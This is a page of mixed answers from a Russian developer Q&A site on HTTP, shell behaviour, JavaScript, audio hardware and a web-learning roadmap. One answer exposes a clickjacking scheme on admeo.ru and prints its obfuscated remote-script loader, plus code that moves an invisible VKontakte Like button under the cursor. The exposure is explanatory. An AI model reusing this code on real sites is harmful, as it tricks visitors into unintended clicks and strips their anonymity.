Задать вопрос
  • Можно ли подделать Content-length?

    nazarpc
    @nazarpc
    Open Source enthusiast
    Если Content-Length больше фактического тела, тогда веб-сервер будет ожидать получения данных и в итоге завалится по таймауту так и не дождавшись всех данных (либо часть следующего запроса попадет в конец тела текущего), если же наоборот - то конец текущего запроса попадет в начало следующего и следующий запрос завалится.
    То есть если вы получили корректный запрос - то Content-Length это фактическое количество данных.
    Если вы реализовываете HTTP сервер самостоятельно - вам нужно всё это проверять, если же пользуетесь готовым - то по факту да, можно доверять.
    Ответ написан
    Комментировать
  • На чем писать клиент-сервер с 10 000+ онлайном и 36 000 000 запросов в час?

    @abcyu
    Разработчик
    "На чем" - не правильный вопрос.
    Ничего страшного для используемых вами технологий в такой нагрузке нет.
    PHP и Facebook использует. MySQL и mail.ru использует.

    Нужно правильно архитектуру спланировать.
    Очень здорово снижает нагрузку правильное использование кэширования в оперативной памяти
    habrahabr.ru/search/?q=Tarantool
    Ответ написан
    Комментировать
  • Можно ли использовать letsencrypt в коммерческих проектах?

    Scorpi
    @Scorpi
    Commercial users are welcome to use Let's Encrypt for commercial and for-profit purposes. This is an intended use; we don't have any desire to restrict the use of our services to non-profit or non-commercial purposes.
    https://community.letsencrypt.org/t/are-they-limit...
    Ответ написан
    Комментировать
  • Какие есть методики отладки веб-приложения?

    DmitriyEntelis
    @DmitriyEntelis
    Думаю за деньги
    Правильное решение в данном случае: поднять на новом сервере какой нибудь vagrant / docker с окружением максимально идентичным исходному.
    В остальные решения от лукавого, полноценный дебаг приложения со сложной логикой это гарантированные человеко-месяцы.
    Ответ написан
    Комментировать
  • Какой алгоритм работы у консоли, когда в ней пишешь название приложения и команду?

    Rsa97
    @Rsa97
    Для правильного вопроса надо знать половину ответа
    Консоль ничего не знает. В простейшем случае (если набрана одна команда без пайпов и перенаправления потоков):
    Когда вы набираете строку и нажимаете Enter сначала из строки отделяется первая подстрока до пробела (или конца строки, если пробелов нет). Остаток строки будет передан выполняемой команде как аргументы.
    Затем проверяется, не является ли эта подстрока внутренней командой шелла. Если да, то выполняется эта команда.
    Если это не внутренняя команда и не указан полный путь к файлу, то идёт поиск файла с таким именем в каталогах, перечисленных в строке окружения PATH. Если файл найден и у пользователя есть права на его запуск, то он запускается.
    Если указан полный путь (например, /usr/bin/perl), то поиск не производится, идёт только проверка на права запуска.

    PS. Если речь о досовском/виндовом cmd, то он ищет файлы добавляя расширения .bat, .cmd, .exe, если расширение не указано явно. Кроме того, в нём поиск начинается с текущего каталога, а затем уже по переменной PATH.
    Ответ написан
    4 комментария
  • Как усовершенствовать код и избавиться от множества глобальных переменных?

    vawsan
    @vawsan
    Frontend Developer
    Вот более правильный вариант, вам правда уже быстрее меня ответили.
    <script type="text/javascript">
    		(function () {
    			function makeArray() {
    				var arr1 = getArray("#ul1"),
    					arr2 = getArray("#ul2");
    
    				function getArray(selector) {
    					if (selector)
    						return Array.prototype.slice.apply(document.querySelector(selector).getElementsByTagName('li'))
    							.map(function (curr) {
    								return curr.innerHTML
    							})
    					return [];
    				}
    
    				for (var i = 0; len = arr2.length, i < len; i++) {
    					if (arr1.indexOf(arr2[i]) < 0)
    						arr1.push(arr2[i])
    				}
    				return arr1.join(", ");
    			};
    
    			document.getElementById('makeNewArray').onclick = function () {
    				var div = document.createElement('div');
    				div.innerHTML = makeArray();
    				body.appendChild(div);
    			};
    		})();
    	</script>

    Но это легко понимаемый вариант с получением списков по отдельности.

    Если же вам все равно сколько списков и не важно, откуда каждый элемент по отдельности, есть мегакороткий вариант:
    <script type="text/javascript">
    		(function () {
    			function makeArray() {
    				return Array.prototype.slice.apply(document.querySelectorAll("li"))
    					.map(function (curr) {
    						return curr.innerHTML
    					})
    					.filter(function (item, pos, self) {
    						return self.indexOf(item) == pos;
    					})
    					.join(", ");
    			};
    
    			document.getElementById('makeNewArray').onclick = function () {
    				var div = document.createElement('div');
    				div.innerHTML = makeArray();
    				body.appendChild(div);
    			};
    		})();
    	</script>
    Ответ написан
    Комментировать
  • Отфильтровать шум в данных?

    XNoNAME
    @XNoNAME
    Эникейщик
    Из координат и времени можно получить скорость и направление движения ТС
    Фильтрация будет заключаться в том, что бы убрать точки в которых скорость выше нормальной и/или направление кратковременно меняется на недопустимый угол.
    Ответ написан
    Комментировать
  • Влияет ли аудиокарта на качество звука и музыки?

    @moozooh
    Chief Technical Grammar Nazi
    Влияет на ряд объективных параметров:
    • наводки и посторонние призвуки (например, свист при движениях мыши);
    • фоновый шум и динамический диапазон;
    • мощность выхода на наушники (проявляется в низкой громкости и хрипах на высокой амплитуде);
    • гармонические и интермодуляционные искажения (звучат по-разному, текстом описать сложно);
    • взаимопроникновение каналов;
    • искажения от погрешностей некачественной передискретизации (например, старые карты Creative аппаратно пересчитывали все звуки в 48 КГц перед выводом, причём не по самому качественному алгоритму);
    • принципиальную возможность воспроизведения записей высокого разрешения (например, 24/44.1, 24/96, 24/192) без принудительной передискретизации.


    Также разные ЦАПы — не единственные, но основные компоненты саундкарты, влияющие на качество вывода — незначительно отличаются друг от друга характером звучания; например, чёткостью атаки. Между качественными ЦАПами, используемыми в профессиональном и полупрофессиональном оборудовании (CS4398, AK4620, AD1853 и т. п.), разница сугубо гомеопатическая и заметная только на тракте очень высокого класса, но всякие бюджетные встроенные реалтеки от них, как правило, можно и на нормальных наушниках отличить. Но, опять же, не в любых условиях, не на любом материале, и только с пониманием, в чём заключается разница.

    Вопрос сводится к тому, достаточно ли хорошо вы понимаете, что всё это значит, и хватит ли возможностей вашей техники и качества ваших записей, чтобы всё это услышать. На самом деле, если очень грубо разложить влияние различных частей условно хорошего и условно плохого аудиотракта на итоговое восприятие, то получится примерно следующее:

    30% — осознание слушателем разницы (понимание, что нужно услышать);
    25% — возможность физически услышать разницу (наличие требуемых физиологических возможностей и аспектов музыкального слуха);
    20% — наличие разницы в обработке материала (эквалайзеры, другая постобработка, различия в громкости) и акустическом оформлении помещения (если речь о прослушивании через акустическую систему) или фоновом шуме (если речь о наушниках);
    15% — наличие разницы в звуковом материале (артефакты и искажения, которые есть в одной записи и отсутствуют в другой);
    9,9% — разница в качестве АС/наушников (и усилителя, если речь о наушниках или пассивных АС);
    0,099% — разница в качестве ЦАПа/операционных усилителей звуковой карты;
    0,001% — разница в качестве других компонентов системы.

    Я рекомендую подходить к решению вопроса качества звука последовательно, и именно в таком порядке; к тому же, так обычно выходит дешевле всего. Кидаться покупать дорогую саундкарту и АС и слушать на них МП3 с убогим мастерингом и выкрученным на эквалайзере басом, сидя в прямоугольной комнате с кучей плоских поверхностей и окном, выходящим на проезжую часть — что выбрасывать деньги на ветер.
    Ответ написан
    1 комментарий
  • Как создать сайт вроде спрашивай.ру?

    HoHsi
    @HoHsi
    Не стоит сразу же замахиваться на большой сервис, начните постепенно. Каждый начинающий программист первым своим проектом грезит сделать убийцу ВК / FB. Скажу сразу, это с первого раза не выйдет. Как не выйдет и с 10. Но! Это не повод, что-бы не развиваться и не учиться. Итак если вы все же решили потрать пару месяцев на обучение, или вы уверены, что пойдет меньше, начните так:

    Шаг первый
    Html. Это язык разметки, на котором написано 100% веба, то есть это необходимая вещь де-факто. Он позволит вам разместить текст на странице, оформить ее.
    В базовой аналогии, это ворд для интернета (кышь Ъ праграммысты, это довольно хорошая аналогия для новичка, продолжим...).

    Это займет +- 1 неделю

    Вам помогут:
    * htmlbook

    Шаг второй
    CSS. Это язык стилизации. Перекрасить текст, увеличить отступы, сделать тень у блоков это к нему. Все крависости в интернете делаются на нем. 99% веба использует для стилизации именно его, так что опять же это стандарт.

    Это займет +- 2 недели

    Вам помогут:
    * Sorax

    Шаг третий
    PHP. Это уже язык программирования (плохой, больной, уродливый, но язык. Да начнется холивар). Он поможет вам понять как это работает, как устроена кухня. Поковыряйте его, обучитесь начальной логике и алгоритмам. Он поможет вам выводить HTML более осмыслено, т.е. вы сможете уже составлять динамические страницы, которые могут подстраиваться под пользователя, добавлять посты, вопросы, картинки и т.д.

    Это займет +- 2 месяца

    Вам помогут:
    * php.net

    Шаг четвертый
    Wordpress. Это почти готовый сайт. В нем уже есть все, что вам нужно. Вы можете писать посты, делать обсуждения и т.д. На его основе вы сможете вылепить что угодно, даже тот самый вопросник. Он написан на PHP, так что он будет дополнять ваши знания. Как только научитись ставить WP, попробуйте написать для него шаблон, потом плагин, и еще и еще. Это закрепит и разовьет ваши предыдущие знания.

    Это займет +- 2 месяца

    Вам помогут:
    * wp-kama

    Шаг пятый
    MySQL. И в частности язык запросов SQL. Это база данных. Они нужны, что-бы хранить информацию вашего сайта в удобном виде. Т.е. по своей сути это таблица экселя, в ней есть поля и их значения. Это так же необходимые знания, так как ваши вопросы из вопросника будух храниться именно там.

    Это займет +- 1 месяц

    Переломный момент
    Наступает переломный, это значит что по истечению полу-года вы должны сесть и подумать, нравится ли вам, что вы делали. Это важно. Так как дальше не будет проще, не будет легче. Начнутся такие вещи как Асинхронность, Брокеры сообщений, ООП, MVC, и другие страшные слова, которые ровно как и предыдущие шаги по-началу будут вас пугать, но потом станут лучшими друзьями.

    Если вам действительно интересно большее, то можете изучить шаги приведенные ниже. Если же вы просто хотите развлечься, то вам вполне хватит перечисленных выше.

    Не спешите так же переходить к шагам ниже, если не уверены в своих силах. Нет ничего плохого, что-бы "посидеть" еще на предыдущих шагах.

    Шаг пятый
    JavaScript. Ура, вы решили, что вы хотите быть программистом, похвально. Этот язык позволит вам сделать ваши страницы более динамичными. Добавить на них анимацию, логику. Этот язык использует 90% веба, так что сомневаться в его значимости нет смысла. Он позволит вам добавить жизнь на ваш сайт.

    Это займет +- 2 месяц

    Вам помогут:
    * Sorax
    * learn.javascript.ru

    Шаг шестой
    Jquery. Это продолжение JS. Это фреймворк (набор готовых функций). Он облегчит вашу работу с JS и позволит делать ее более качественно и быстро.

    Это займет +- 1 месяц

    Шаг седьмой
    Распутье. Вы уже как год программист, отличная работа. Вы уже выросли из яслей и впереди бескрайний океан. И теперь вы должны понять, что вы хотите. Устраивают ли вас сейчас ваши текущие инструменты. Удобные ли они. Не стесняют ли они вас.

    Если вам нравится PHP, он удобен, тогда продолжите изучать именно его, но не стоит бездумно и слепо защищать язык. Если вы чувствуете, что он вас смущает, не противьтесь и просто попробуйте что-то другое. А поверьте этого много.

    Итак развилка:
    Мне нравится PHP, мама я женюсь!
    Ок, тогда вам стоит взглянуть на фреймворки Laravel, Yii 2, вполне хороши. Они довольно мощные и позволят много чего на себе сделать.

    PHP какой-то странный, но мне понравился JavaScript
    Шикарно, значит есть смысл попробовать NodeJS. Это версия языка (Да, я знаю, что нода это среда а не язык, дайте уже объяснить человеку) расчитаная на составление страниц, как PHP. Это очень мощный инструмент, поняв который, вы вряд ли захотите уйти с него. Он поможет вам писать не только сайты, но и приложения для телефонов / планшетов, программы для ПК, возможно игры (но не стоит. По крайней мере с текущим развитием инструментов), демоны, сервисы, консольные приложения и т.д.

    Они оба мне не нравятся
    Что ж, тогда вам могут приглянуться Python, Ruby - эти два языка более близки к PHP, чем JS.
    Или вы за год стали адептом скорости, и не видите большей радости в жизни чем оптимизация и быстрото рендеренга. Ну тогда вам точно понравятся GO и Rust.
    А может быть Dart к тому временем станет мейн стримом, это уже покажет время.

    Что-бы вы не выбрали, это будет хорошим решением.

    Шаг восьмой
    Как говорится, я просто оставлю это здесь. Сейчас нет смысла объяснять, что это, зачем оно и с чем его едет, вы просто взглянете через год на этот список и все поймете.

    CSS:
    * Sass / Less / Stylus

    JS:
    * CoffeeScript / LiveScript / TypeScript
    * Angular
    * Promise

    NodeJS:
    * NPM
    * Express

    Ускорение работы:
    * Gulp
    * Jade
    * Yo

    Остальное:
    * MongoDB
    * MariaDB
    * RabbitMQ

    Шаг 7 и 8 займут у вас всю жизнь
    Это не в коем случае не значит, что язык будет тем же, просто Язык / Технолигия будут заменяться на другую, а смысл будет тем же. Будут новые технологии, будут новые подходы, новые языки. Будет интересно и весело.
    Ответ написан
    15 комментариев
  • Как понять, какая величина line-height?

    delch
    @delch
    Frontend developer
    Если речь идет о макете, то в шотофопе всё есть.
    8b026900eb1041b999ddc73c5aaf69e8.png
    Ответ написан
    Комментировать
  • Почему не удаляется первое значение из масива с ключем 0?

    VladimirAndreev
    @VladimirAndreev
    php web dev
    потому что 0 == false...
    любые функции, которые возвращают ключи массивов, позиции в строках и т.п. нужно проверять так:

    if(false !== array_search($form, $bad_block)) {
        // ...
    }
    Ответ написан
    Комментировать
  • Как admeo.ru узнает номер телефона?

    27cm
    @27cm
    TODO: Написать статус
    Clickjacking

    О кликджекинге написано много статей, в том числе и на Хабре, но всё же заглянем внутрь admeo.ru и посмотрим, как это реализовано у них.

    1. В коде есть скрипт, буквально бросающийся в глаза:
    <script src="data:text/javascript;charset=utf-8;base64,KGZ1bmN0aW9uKGIsYyl7c2V0VGltZW91dChmdW5jdGlvbigpe3ZhciBhPWRvY3VtZW50LGY9YS5nZXRFbGVtZW50c0J5VGFnTmFtZSgic2NyaXB0IilbMF0scz1hLmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpLGg9ZXNjYXBlKGEucmVmZXJyZXIpO3MudHlwZT0idGV4dC9qYXZhc2NyaXB0IjtzLmNoYXJzZXQ9IlVURi04IjtzLmFzeW5jPSEwO3Muc3JjPSIvLyIrYisiLyIrYysiLmpzP3I9IitNYXRoLnJhbmRvbSgpO2YucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUocyxmKX0sMCl9KSgiYWRtZW8ucnUiLCJlZGI0MmE4MTg3MzE4NTY5NmFjNTJlMmJiNGJmNmVlYSIpOw==" async=""></script>

    2. Декодируем:
    (function(b,c){setTimeout(function(){
    var a=document,f=a.getElementsByTagName("script")[0],
    s=a.createElement("script"),h=escape(a.referrer);s.type="text/javascript";
    s.charset="UTF-8";s.async=!0;s.src="//"+b+"/"+c+".js?r="+Math.random();
    f.parentNode.insertBefore(s,f)},0)})("admeo.ru","edb42a81873185696ac52e2bb4bf6eea");

    3. Внутри edb42a81873185696ac52e2bb4bf6eea.html:
    <html>
    <head></head>
    <body onclick="admeoVk.click()">
    <div id="vk_api_transport"></div>
    <div id="cwvkid" style="cursor:pointer!important;clear: both;background: none;position: fixed !important;top: 0;left: 0;bottom: 0;right: 0;width: 100%;height: 100%;border: none;margin: 0;padding: 0;opacity: 0;z-index: 88888;visibility: visible;"></div>
    <div id="myvklogin"></div>
    <script language="JavaScript">
        var admeoParams = {
            token: 'edb42a81873185696ac52e2bb4bf6eea',
            apiUrl: 'http://admeo.ru/',
            appId: 4906527,
            host: 'admeo.ru',
            siteId: 15,
            cName: 'amuid'
        };
    
        (function(i,s,o,g,r,a,m){i['AdmeoObject']=r;i[r]=i[r]||function(){
                (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
            m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script', 'http://static.admeo.ru/assets/core/_vk.js','admeo');
    </script>
    </body>
    </html>

    Странное решение оставить cursor:pointer!important...
    4. static.admeo.ru/assets/core/_vk.js
    5. Прозрачная кнопка Like Вконтакте движется под курсором и ждёт, когда на неё кликнут:
    window.onmousemove = function(e){
        document.querySelector('#cwvkid').style.left = e.pageX - 70;
        document.querySelector('#cwvkid').style.top = e.pageY - 12;
    };
    Ответ написан
    10 комментариев
  • Как проверить встречается ли одна из фраз в тексте?

    AnnTHony
    @AnnTHony
    Интроверт
    Можно попробовать найти сначала совпадение по общему слову, например. "СКИДК"
    Узнаете начальную позицию слова, обрезаете 10-20 символов вперед и назад (У НАС САМЫЕ ОГРОМНЫЕ СКИДКИ И ПОДАР...) и в получившейся строке уже ищете остальные более полные фразы.
    Всяко быстрее чем по всему тексту рыскать.
    Ответ написан
    1 комментарий
  • Как на лету преобразовывать строку в объект, как при использовании нативных методов?

    Один из вариантов - добавить методы в String.prototype.
    String.prototype.doSmth = function() { console.log('test'); };
    var t = new String('q');
    var t2 = 'abcd';
    t2.doSmth(); \\ test
    t.doSmth(); \\ test
    'abcd'.doSmth() \\ test

    Но вообще говоря так делать не очень хорошо.
    Лучше сделайте свой объект, например
    function MyString(str) {
        var self = this;
        self.str = str;
    }

    И в него добавьте все нужные вам методы.
    Тогда вызов вашего метода превратится из
    'строка'.toUpperCase()
    в 
    new MyString('cтрока').myMethodName()

    Вот пример создания класса, который наследует прототип от String: gist
    Ответ написан
    2 комментария
  • Как это понимать(composer.json)?

    difiso
    @difiso
    В параллельной вселенной я космонавт
    Скорее всего потому что его нет в зависимостях у leopandro/yii2-user
    Ответ написан
    3 комментария
  • Какой самый быстрый и лучший метод чтоб привести число к строке?

    @vilgeforce
    Раздолбай и программист
    toString() вас не устраивает по скорости или потому что не "самый лучший"?
    Ответ написан
    5 комментариев
  • Как массово изменить размер шрифта в фотошопе?

    pozZzitiv
    @pozZzitiv Куратор тега Adobe Photoshop
    Дизайнер и перфекционист
    Выделяются все слои с текстом и указываются в панели свойств текста нужные параметры.
    Ответ написан
    1 комментарий
  • Как вывести разницу между датами?

    Stalker_RED
    @Stalker_RED
    Немного брутальной отладки.
    Q29N8aw.png
    Что мы видим? Days = NaN и дата не дата. Местами даже пустая строка.

    Немножко читаем доки по datepicker-у.
    О, getDate помог, теперь дата в правильном формате! Но только одна...
    R22NpMM.png

    А это всё потому, что datepicker-ов на странице больше двух, и :last портит всю красоту!
    jYUjEkA.png

    Победа!
    MfLTV4J.png

    P.S.: Я бы посоветовал дать полям имена, и выбирать $('input[name="arrival"]') или типа того.
    Ответ написан